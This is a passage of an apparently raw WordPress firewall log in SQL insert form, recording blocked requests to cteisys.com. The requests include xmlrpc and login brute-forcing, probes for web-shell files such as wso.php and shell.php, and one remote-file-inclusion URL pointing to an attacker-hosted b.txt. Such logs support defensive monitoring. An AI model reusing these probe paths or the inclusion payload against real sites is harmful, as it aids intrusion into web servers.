Firefox\\/96\"}','Ke83jQAlkcIZfuhS0b5FqwxU',0,1663836754.8179,18977,'','POST',403,0,515,0,1,'',0),('5.101.157.235',90545643,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rWFHlaZnfwkGSsOV8EQByN34',0,1663836213.6798,1292,'','POST',403,0,515,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7rW0eZljxcPDEQVHitndqBb6',0,1663836073.1249,1279,'','POST',403,0,515,0,1,'',0),('139.59.228.23',2335958039,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Vv9z0b5Ws2FDMB63UOhnSjkr',0,1663835712.0268,1432,'','POST',403,0,515,0,1,'',0),('128.199.134.216',2160559832,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YT0ehgLoE7N2KDzsfGmXrB1n',0,1663835300.8065,1232,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TuXZh6tFp52Wd3PDHrVSiCwf',0,1663834796.6364,1309,'','POST',403,0,515,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DVay4bSqTzdh7iewWnQmgN0u',0,1663834657.0494,19609,'','POST',403,0,515,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qTaOgK4eJYSsV2zu0RDxcB6C',0,1663834264.7742,3244,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//olux.php','','{\"1\":\"\"}','CFdHv0GbKLI3xtyNV1Mu4SR8',0,1663841621.2425,349,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','https://cteisys.com/wp-login.php?action=register','','{\"1\":\"\"}','9BVw6fCykigpKD403Qqu7SYo',0,1663841626.1111,1864,'','GET',404,0,600,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//wp-email.php','','{\"1\":\"\"}','JKtnNVDm1Z0uWBTce2pgSR4O',0,1663841620.4422,317,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//wso2.php','','{\"1\":\"\"}','RHxShjvEsGkc0MTrp1tAzwIY',0,1663841618.7599,331,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//w3llstore.php','','{\"1\":\"\"}','thOLlukvwbrSeHi3UP48MR05',0,1663841619.6160,348,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//wso.php','','{\"1\":\"\"}','ANeILc8PoFfilBWhst9qHn3j',0,1663841617.9720,285,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//wp-class.php','','{\"1\":\"\"}','ZqhmVfiDTynJsLjIrM3APQCB',0,1663841605.4090,11931,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//wp-ver.php','','{\"1\":\"\"}','clyou0VFpX3qgdUWnNseJ7Zf',0,1663841615.6332,1882,'','GET',403,0,700,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2HWapETC9hU83ndfwo0PKmGs',0,1663840640.6568,1923,'','POST',403,0,515,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','T5DIMbutPLOBnRC7fYG6oxgX',0,1663840541.6156,1273,'','POST',403,0,515,0,1,'',0),('68.183.15.215',1152847831,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5JjAkSO0pxT1bIQR846VYBs3',0,1663839958.9087,2290,'','POST',403,0,515,0,1,'',0),('209.145.54.181',3515954869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ijPCm835rBsgWT7pKMzOltZu',0,1663838414.8503,1296,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YB59oXNnpyS6MsJb83j0CtqR',0,1663838276.4714,1356,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sHd1ctYXnoTwqbNKR28jACU3',0,1663837865.5975,1555,'','POST',403,0,515,0,1,'',0),('116.62.49.96',1950232928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','I3B9FTVMDqPUyAfEiW8uGpYv',0,1663837723.4022,7474,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YftP5x0p2Lms9GriaTwMu8EN',0,1663837312.0294,1976,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/w3llstore.php','','{\"1\":\"\"}','U97VgykZhvL268NQrRjbK3iF',0,1663841659.5642,339,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/wso.php','','{\"1\":\"\"}','KLt6uFXU4rNqhECT39iPw0sV',0,1663841657.8763,357,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/wso2.php','','{\"1\":\"\"}','yti0kqXD1HZJKAYml7w8FOWU',0,1663841658.7447,346,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/wp-class.php','','{\"1\":\"\"}','hEMqaPS8wK21tgsVnIrAQyjF',0,1663841656.3156,290,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/wp-ver.php','','{\"1\":\"\"}','J5ftpzFnZdHKkyPbxc1M8INU',0,1663841657.0581,327,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/shell.php','','{\"1\":\"\"}','WiTBRlbSf3y02rDhuZVdePxm',0,1663841654.7180,332,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includesmini.php','','{\"1\":\"\"}','abfqwvPc4nxihDs9e5dCUY1t',0,1663841655.5405,295,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/olux.php','','{\"1\":\"\"}','2MIfR3UtuO1XVKmJZlGSyePA',0,1663841653.1220,283,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/wp-activate.php','','{\"1\":\"\"}','nHiRyBfLJu6grXkSwsl2Q7WF',0,1663841653.8915,318,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/wso2.php','','{\"1\":\"\"}','vS26iApWg93JotUlMOLmuYTK',0,1663841650.7375,300,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/w3llstore.php','','{\"1\":\"\"}','9goC5wNDBahufpQvAcMW3RjO',0,1663841651.5241,298,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/wp-email.php','','{\"1\":\"\"}','a06gWhvezlTHw74mAdCLDRnX',0,1663841652.3008,303,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/wso.php','','{\"1\":\"\"}','qbFln0kMoI6HxCQRTA2iuLPG',0,1663841649.9398,320,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-contentmini.php','','{\"1\":\"\"}','iQJwB9FtsKn2omWuAxZPjEbh',0,1663841647.5368,275,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"\"}','Zkrlo75Qs2h3PMODTSGmUv0J',0,1663841648.2876,308,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/wp-ver.php','','{\"1\":\"\"}','n94zfsoFNuHdElTawYcRGAxC',0,1663841649.0792,371,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/wp-activate.php','','{\"1\":\"\"}','6HMlnFXduWaNorhkygxzUS1t',0,1663841646.0282,278,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/shell.php','','{\"1\":\"\"}','kCvYhQLt401HlygOnITBD2rV',0,1663841646.7628,311,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/olux.php','','{\"1\":\"\"}','H6dhrCwLXxMi8pf5Ja1KWcgE',0,1663841645.2273,296,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/w3llstore.php','','{\"1\":\"\"}','ECrYm9yM7jqnXgVSDiZKtduw',0,1663841643.5790,406,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/wp-email.php','','{\"1\":\"\"}','l9cHEvxBrTmV7Q4CAO3fIysM',0,1663841644.4505,309,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/wso2.php','','{\"1\":\"\"}','Plt2ZNeHjfkGDhQE1Up0IBd9',0,1663841642.7811,325,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/wp-ver.php','','{\"1\":\"\"}','6i3gdKW1UTaMD7qn9EHOZX8B',0,1663841640.5665,835,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/wso.php','','{\"1\":\"\"}','A1tnVONI0387q6Rr9eys5xaU',0,1663841641.8964,379,'','GET',403,0,700,0,1,'',0),('51.159.105.232',866085352,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mCMJGAkdHt1UvleTSyI8Epqh',0,1663846308.8355,1213,'','POST',403,0,515,0,1,'',0),('101.37.28.132',1696930948,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MGiLkU54SbQvDK2OYZB0A6lp',0,1663845867.3530,1522,'','POST',403,0,515,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','LEJ9cOy6egD5sSbqYTGwMQtC',0,1663845310.0221,517,'','POST',403,0,600,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','gqLMf2XcSlis7Uzh6JbEINp8',0,1663845307.6360,553,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/media-admin.php.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','UE1nGMYqhviuIQwjZ6XdcVFP',0,1663845305.0248,867,'','GET',403,0,700,0,1,'',0),('203.118.155.133',3413547909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RKqBXIaHCnL1PiyjxA8FMYS6',0,1663845142.9225,1354,'','POST',403,0,515,0,1,'',0),('107.167.244.83',1806169171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','A1TtUSZnwxX2DFk04ReCKV58',0,1663845020.2195,1400,'','POST',403,0,515,0,1,'',0),('103.8.26.65',1728584257,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','06NHWvyIUhJk9FmzE3u7s8AK',0,1663844713.8058,3752,'','POST',403,0,515,0,1,'',0),('23.111.152.238',393189614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','2xAboYuljvFT1qLIpwcCGKPQ',0,1663863474.6479,636,'','POST',403,0,600,0,1,'',0),('23.111.152.238',393189614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','dPpGO3SKcWvxwHLa95BnMtVU',0,1663863473.4931,581,'','POST',403,0,600,0,1,'',0),('216.70.93.152',3628490136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','xkCQuTOPE2VNiLq0fwG58FAU',0,1663863468.8720,1442,'','POST',403,0,600,0,1,'',0),('216.70.93.152',3628490136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','3KMhnCuoTtidPjFIESfDJryl',0,1663863467.0300,1342,'','POST',403,0,600,0,1,'',0),('139.59.150.45',2335938093,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','cPWVxvBuyzbm9G7ZwItMHaoq',0,1663862816.8914,1742,'','POST',403,0,600,0,1,'',0),('142.93.41.19',2388470035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','5xK4U2RILs3fG6QJd7nCrMpA',0,1663862770.4658,19409,'','POST',403,0,600,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LBnxejlMOygCAShZ4p6siTIR',0,1663861114.2469,1533,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZyIvSADsUpg82w75zWcGPQxV',0,1663849975.0088,526,'','POST',403,0,600,0,1,'',0),('83.150.214.18',1402394130,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','qI482uEvogjKJOaPAdNBCrkS',0,1663849921.4904,518,'','POST',403,0,600,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mdDSEiHRy1zIPcn9AJBYg0VG',0,1663849729.2447,473,'','POST',403,0,600,0,1,'',0),('83.150.214.18',1402394130,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','dKSD4yCOPAxke9MzX687015L',0,1663849919.9212,507,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/system_log.php?bala=up','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','5ZjoKVRqFhQrBXAi07UENd1w',0,1663849670.9957,11967,'','GET',403,0,700,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/kontol/index.php?memex=http://152.89.196.13/b.txt','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko\\/20100101 Firefox\\/68.0\"}','2zUtgqMDCaWGYponl65JfEZ1',0,1663849671.0996,11853,'','POST',403,0,700,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/stats.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','0djfzVJZs5O461NqaRH3Ebvp',0,1663849477.2393,301,'','POST',403,0,700,0,1,'',0),('177.52.160.32',2973016096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ubZL5xl9Mjh3n4ygPIpGoJN7',0,1663848865.8106,550,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/cache/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','UjAbz12ZCxRnk4dacHrtXvNo',0,1663848667.6395,284,'','GET',403,0,700,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jwAvWbYkdLX9nJfqIy15amzP',0,1663848607.2459,621,'','POST',403,0,600,0,1,'',0),('149.129.181.108',2508305772,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RImUQC0u5hgXoABxH198jn2p',0,1663860962.3998,2065,'','POST',403,0,515,0,1,'',0),('185.69.154.241',3108346609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','DkeQ9Li8UwTVhGC30n6ju4Km',0,1663860343.4805,445,'','POST',403,0,600,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','25JcU0BnRZDNCf3MWVXy4gi8',0,1663854885.5625,1468,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WKpxRl2iGoSyk0VUIDb9AX6Y',0,1663854249.5038,1228,'','POST',403,0,515,0,1,'',0),('159.65.147.193',2671875009,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u9cDrdtl4VSGEiQFsBoqCNxL',0,1663853634.2446,18920,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PeYUFqO4ZK2CjxENG70BtcWn',0,1663854108.9592,1766,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9JgprP7DxbyemjQMTs08I5Nf',0,1663853141.6055,1762,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p4xh8vFKeWwu7kYiGOnM2B0T',0,1663852978.4315,1681,'','POST',403,0,515,0,1,'',0),('188.127.239.132',3162500996,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','3JKSqEAvIjQ8ZfzmM0uCD4c2',0,1663852678.9232,1321,'','POST',403,0,600,0,1,'',0),('188.127.239.132',3162500996,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','OfCGR28AVQDhxm7BWwrFl4cI',0,1663852676.6844,511,'','POST',403,0,600,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V0BehtxlAKE518RQ2aLkvs6M',0,1663852374.3655,1398,'','POST',403,0,515,0,1,'',0),('159.65.147.193',2671875009,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5V0SoClvbJdjf3rQNU7IwyEe',0,1663851882.8829,18226,'','POST',403,0,515,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yXkUMlFoqAtag1d4BK7h98Yz',0,1663851719.5780,17882,'','POST',403,0,515,0,1,'',0),('185.69.154.241',3108346609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','vWh0FNVkUtIb5Y34BzHowrsn',0,1663860341.8184,531,'','POST',403,0,600,0,1,'',0),('148.72.209.0',2487800064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sfKoThyZDB2x9rn1mNUIFa8M',0,1663860317.3067,1752,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HITMunsJPiKAhXDp0eL21lWB',0,1663858558.9069,1275,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bmIx3BXJn8KaEd2l1NjWu4UG',0,1663859680.2889,525,'','POST',403,0,515,0,1,'',0),('45.77.125.145',760053137,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','3JuhnCRaZlmE1NP24I5KzfxD',0,1663858337.5678,578,'','POST',403,0,600,0,1,'',0),('5.101.157.235',90545643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','38Ue1jxKWCkrHs6fgzhLbJE2',0,1663858049.6400,474,'','POST',403,0,600,0,1,'',0),('5.101.157.235',90545643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','2HUWERwQp93zGIuOvc5fiLdy',0,1663858047.7571,650,'','POST',403,0,600,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c6lLFTrwfEmp1bV5SN3vnXiK',0,1663857910.6857,2816,'','POST',403,0,515,0,1,'',0),('104.219.251.247',1759247351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u3QiLn729yPZAtsIBlJM5pVS',0,1663857771.0478,1330,'','POST',403,0,515,0,1,'',0),('95.111.225.89',1601167705,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ke4yAhoZi2T9rwOMadI5s1Uu',0,1663857134.6777,1878,'','POST',403,0,515,0,1,'',0),('212.1.211.12',3556889356,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 